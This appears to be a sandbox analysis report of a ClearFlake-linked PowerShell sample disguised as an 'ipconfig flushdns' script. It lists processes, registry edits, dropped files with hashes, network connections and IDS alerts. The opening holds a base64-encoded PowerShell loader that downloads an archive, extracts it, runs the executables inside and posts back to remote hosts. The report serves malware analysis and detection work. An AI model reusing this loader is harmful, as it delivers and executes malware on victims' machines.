7ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJABDAGgAQQByAFMALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApACAAfQApAAoACgAgACAAIAAgACAAIAAkAHQARQBNAHAAZABJAFIAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAEUAbgB2ADoAVABFAE0AUAAgACIAJABEAEkAUgBuAGEATQBlACIACgAKACAAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBQAGEAdABoACAAJAB0AEUATQBwAGQASQBSACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlAAoACgAkAFoASQBQAE4AYQBNAGUAIAA9ACAALQBqAG8AaQBuACAAKAAxAC4ALgAkAE4AQQBtAGUATABlAE4AZwB0AEgAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAQwBoAEEAcgBTAC4AVABvAEMAaABhAHIAQQByAHIAYQB5ACgAKQAgAH0AKQAgACsAIAAnAC4AegBpAHAAJwAKAAoAIAAgACAAIAAgACQATwBVAFQAcABVAHQAUABhAFQASAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAdABFAE0AcABkAEkAUgAgACQAWgBJAFAATgBhAE0AZQAKAAoAJABoAEUAYQBEAGUAUgBzACAAPQAgAEAAewAgACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACAAPQAgACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAAMQAwAC4AMAA7ACAAVwBpAG4ANgA0ADsAIAB4ADYANAApACAAQQBwAHAAbABlAFcAZQBiAEsAaQB0AC8ANQAzADcALgAzADYAIAAoAEsASABUAE0ATAAsACAAbABpAGsAZQAgAEcAZQBjAGsAbwApACAAQwBoAHIAbwBtAGUALwAwAHgAMQA3ADAAMAAwADAAMAAwACAAUwBhAGYAYQByAGkALwA1ADMANwAuADMANgAnACAAfQAKAAoAIAAgACAAIAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdABSAHUARQApACAAewAKAAoAIAAgACAAIAAgACAAdAByAHkAIAB7AAoACgAgACAAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATwBVAFQAcABVAHQAUABhAFQASAApACAAewAKAAoAIAAgACAAIAAgACAAIAAgACAAJABmAEkAbABFAGkATgBGAE8AIAA9ACAARwBlAHQALQBJAHQAZQBtACAAJABPAFUAVABwAFUAdABQAGEAVABIAAoACgAgACAAIAAgACAAaQBmACAAKAAkAGYASQBsAEUAaQBOAEYATwAuAEwAZQBuAGcAdABoACAALQBuAGUAIAAkAFIARQBTAHAAbwBOAFMAZQAuAEgAZQBhAGQAZQByAHMAWwAiAEMAbwBuAHQAZQBuAHQALQBMAGUAbgBnAHQAaAAiAF0AKQAgAHsACgAKACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAMQAgAC0ATwB1AHQARgBpAGwAZQAgACQATwBVAFQAcABVAHQAUABhAFQASAAgAC0ASABlAGEAZABlAHIAcwAgACQAaABFAGEARABlAFIAcwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAKAAoAIAAgACAAIAAgACAAfQAKAAoAIAAgACAAIAAgAH0AIABlAGwAcwBlACAAewAKAAoAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsADEAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAE8AVQBUAHAAVQB0AFAAYQBUAEgAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgARQBhAEQAZQBSAHMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAACgAKACAAIAAgACAAIAB9AAoACgAgACAAIAAkAGEAVABUAEUAbQBQAFQAUwAgAD0AIAAwAAoACgAgACAAdwBoAGkAbABlACAAKAAkAGEAVABUAEUAbQBQAFQAUwAgAC0AbAB0ACAAMgApACAAewAKAAoAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAewAKAAoAIAAgACAAIAAgACAAIAAkAHAATwBTAFQAcgBlAFMAUABvAG4AcwBFACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBMADIAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgARQBhAEQAZQBSAHMAIAAtAE0AZQB0AGgAbwBkACAAUABPAFMAVAAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAKAAoAIAAgAGkAZgAgACgAJABwAE8AUwBUAHIAZQBTAFAAbwBuAHMARQAuAFMAdABhAHQAdQBzAEMAbwBkAGUAIAAtAGUAcQAgADIAMAAwACkAIAB7ACAAYgByAGUAYQBrACAAfQAKAAoAIAAgACAAIAB9ACAAYwBhAHQAYwBoACAAewAgACQAYQBUAFQARQBtAFAAVABTACsAKwAgAH0ACgAKACAAIAB9AAoACgAgACAAYgByAGUAYQBrAAoACgAgACAAfQAgAGMAYQB0AGMAaAAgAHsAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ACAAfQAKAAoAIAAgACAAIAAgACAAIAB9AAoACgAgACAARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAJABPAFUAVABwAFUAdABQAGEAVABIACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACQAdABFAE0AcABkAEkAUgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAKAAoAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyAAoACgAgACAAIAAgACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAdABFAE0AcABkAEkAUgAgAC0ARgBpAGwAdABlAHIAIAAqAC4AZQB4AGUAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAKAAoAIAAgACQAcAByAE8AYwBlAHMAUwBTAHQAQQByAHQAaQBuAEYAbwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFMAdABhAHIAdABJAG4AZgBvAAoACgAgACAAIAAgACQAcAByAE8AYwBlAHMAUwBTAHQAQQByAHQAaQBuAEYAbwAuAEYAaQBsAGUATgBhAG0AZQAgAD0AIAAkAF8ALgBGAHUAbABsAE4AYQBtAGUACgAKACAAIAAgACAAIAAgACAAJABQAHIAbwBjAGUAcwBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMACgAKACAAIAAgACAAIAAgACQAUAByAG8AYwBlAHMAcwAuAFMAdABhAHIAdABJAG4AZgBvACAAPQAgACQAcAByAE8AYwBlAHMAUwBTAHQAQQByAHQAaQBuAEYAbwAKAAoAIAAgACAAIAAgACAAIABpAGYAIAAoACQAUAByAG8AYwBlAHMAcwAuAFMAdABhAHIAdAAoACkAKQAgAHsACgAKACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AFIAbAAzACAALQBIAGUAYQBkAGUAcgBzACAAJABoAEUAYQBEAGUAUgBzACAALQBNAGUAdABoAG8AZAAgAFAATwBTAFQAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgAKACAAIAAgAH0ACgAKAH0ACgAKAH0ACgAKAAoACgAkAFMAQwByAEkAUABUAGIATABvAEMAawAuAEkAbgB2AG8AawBlACgAJABHAGMAcwAxACkAIAB8ACAATwB1AHQALQBOAHUAbABsAAoACgAkAFMAQwByAEkAUABUAGIATABvAEMAawAgAD0AIABbAHMAYwByAGkAcAB0AGIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACcAZQB4ACcAKwAnAGkAdAAnACkACgAKACYAJABTAEMAcgBJAFAAVABiAEwAbwBDAGsACgAKAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 3972 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\AppData\Local\Temp\ipconfig flushdns.ps1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 4064 | "C:\Windows\system32\ipconfig.exe" /flushdns | C:\Windows\System32\ipconfig.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: IP Configuration Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (3972) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3972) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (3972) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (3972) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (3972) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (2108) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (2108) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2108) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2108) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2108) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3972 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YWNUK74RWAQ46ZL9MZ2S.temp | binary | |
MD5:7B9FC8EDA8DFC3E128623081DB20030C | SHA256:81FB596D7C5C7C9264E891A660D7B00455DD9AC326B9B53816B1F2FE38F4FAED | |||
| 3972 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF103450.TMP | binary | |
MD5:0268C3470C936E6FBAC2945B9E1C2099 | SHA256:DF2AF58E8879B48826D8A418ED3B02CC8D484BCFC231C5B7A11BD153ED3998E9 | |||
| 2108 | powershell.exe | C:\Users\admin\AppData\Local\Temp\m1TvspLm7NlaR\rhombohedron.ai | binary | |
MD5:674DFD74A1BEF081BF0DA83F893138E5 | SHA256:67FF95298E395543EA0C9EEEC6BFFF81688DF379BEC578AA31C52D214B385180 | |||
| 3972 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | dbf | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
| 2108 | powershell.exe | C:\Users\admin\AppData\Local\Temp\iaog00k5.3is.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 2108 | powershell.exe | C:\Users\admin\AppData\Local\Temp\m1TvspLm7NlaR\hv.exe | executable | |
MD5:480F8CF600F5509595B8418C6534CAF2 | SHA256:6D8905EC0B1DFDC0A10D1CCE40714DDD73205A09AD390B933DDBECDCF06A4CF2 | |||
| 2108 | powershell.exe | C:\Users\admin\AppData\Local\Temp\m1TvspLm7NlaR\iepdf32.dll | executable | |
MD5:F3F6876D132EB277842E31DDC42AA7FA | SHA256:4BA2DDDE8A4549D08BFE4441643AA626E84D7653B8DDC6ED61823E78AEB3CDF1 | |||
| 2108 | powershell.exe | C:\Users\admin\AppData\Local\Temp\m1TvspLm7NlaR\F1ZB8V9zrsso4.zip | compressed | |
MD5:665D5CB8BF03EA4637F8A1EB891237CC | SHA256:CA2B787BB72F0BD9D79013AA93800BFD84C73AAD74662C48E69425E4ADFB549B | |||
| 2108 | powershell.exe | C:\Users\admin\AppData\Local\Temp\m1TvspLm7NlaR\shovelnose.deb | binary | |
MD5:90B47672D8134F8CC464D83A5CDE8D34 | SHA256:CC38B5CB522FDF8D2FE5E85C50D72E1B8AC39D36DEB157D4BFFDDA7970C5BA8B | |||
| 2108 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:6675EDE59684F4A119D2E5DA282AFBE6 | SHA256:5026C5EE8FA9ACB21718BF1FAD563C0A3FD5BC79327611FDF9C4ABD2647CE829 | |||
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1088 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
3972 | powershell.exe | 172.67.75.40:443 | rentry.co | CLOUDFLARENET | US | unknown |
3972 | powershell.exe | 52.223.34.155:443 | bsc-dataseed1.binance.org | AMAZON-02 | US | unknown |
3972 | powershell.exe | 104.21.76.71:443 | rsmbscm.businessresources.ltd | CLOUDFLARENET | — | unknown |
2108 | powershell.exe | 52.223.34.155:443 | bsc-dataseed1.binance.org | AMAZON-02 | US | unknown |
2108 | powershell.exe | 172.67.75.40:443 | rentry.co | CLOUDFLARENET | US | unknown |
2108 | powershell.exe | 104.21.76.71:443 | rsmbscm.businessresources.ltd | CLOUDFLARENET | — | unknown |
Domain | IP | Reputation |
|---|---|---|
rentry.co |
| unknown |
bsc-dataseed1.binance.org |
| malicious |
rsmbscm.businessresources.ltd |
| unknown |
businessresources.ltd |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
1088 | svchost.exe | Misc activity | ET INFO Pastebin Service Domain in DNS Lookup (rentry .co) |
3972 | powershell.exe | Misc activity | ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI) |
3972 | powershell.exe | A Network Trojan was detected | ET MALWARE Observed ClearFlake Domain (businessresources .ltd in TLS SNI) |
1088 | svchost.exe | A Network Trojan was detected | ET MALWARE DNS Query to ClearFlake Domain (businessresources .ltd) |
2108 | powershell.exe | Misc activity | ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI) |
1088 | svchost.exe | A Network Trojan was detected | ET MALWARE DNS Query to ClearFlake Domain (businessresources .ltd) |
2108 | powershell.exe | A Network Trojan was detected | ET MALWARE Observed ClearFlake Domain (businessresources .ltd in TLS SNI) |
2108 | powershell.exe | A Network Trojan was detected | ET MALWARE Observed ClearFlake Domain (businessresources .ltd in TLS SNI) |